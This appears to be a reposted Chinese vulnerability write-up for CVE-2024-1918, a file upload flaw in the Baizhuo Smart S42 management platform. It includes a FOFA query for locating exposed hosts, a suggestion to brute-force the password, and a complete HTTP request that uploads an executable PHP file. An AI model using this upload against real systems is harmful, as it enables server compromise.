CVE-2024-1918

admin 2024年2月29日08:34:05评论70 views字数 1759阅读5分51秒阅读模式

使

01

漏洞名称

北京百绰智能S42管理平台userattestation.php无限制上传漏洞

02

漏洞影响

北京百招智能S42管理平台在20240219之前的版本

03

漏洞描述

北京百卓网络技术有限公司(以下简称百卓网络)是一家致力于构建下一代安全互联网的高新技术企业。

百卓网络Smart S42网关智能管理平台/useratte/userattestation.php接口处存在文件上传漏洞。攻击者可利用漏洞获取服务器权限,操作服务器文件。

04

FOFA搜索语句

title="Smart管理平台"

CVE-2024-1918

注意:直接用浏览器访问很可能打不开,可以在虚拟机中用浏览器访问。

05

漏洞分析

代码中进入hidwel分支,且代码125、126行的上传文件没有进行任何后缀限制,造成任意文件上传。

CVE-2024-1918

06

漏洞复现

首先登录系统

CVE-2024-1918

密码自行爆破

文件上传数据包如下

POST /useratte/userattestation.php HTTP/1.1Host: 192.168.40.130:8443Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328Content-Length: 592Origin: https://192.168.40.130:8443Upgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Te: trailersConnection: close

-----------------------------42328904123665875270630079328Content-Disposition: form-data; name="web_img"; filename="1.php"Content-Type: application/octet-stream

<?php phpinfo();?>-----------------------------42328904123665875270630079328Content-Disposition: form-data; name="id_type"

1-----------------------------42328904123665875270630079328Content-Disposition: form-data; name="1_ck"

1_radhttp-----------------------------42328904123665875270630079328Content-Disposition: form-data; name="hidwel"

set-----------------------------42328904123665875270630079328

CVE-2024-1918

访问回显文件/boot/web/upload/weblogo/1.php

CVE-2024-1918

漏洞复现完成

07

修复建议

升级到最新版本。

原文始发于微信公众号(AI与网安):CVE-2024-1918

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月29日08:34:05
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2024-1918http://cn-sec.com/archives/2535611.html

发表评论

匿名网友 填写信息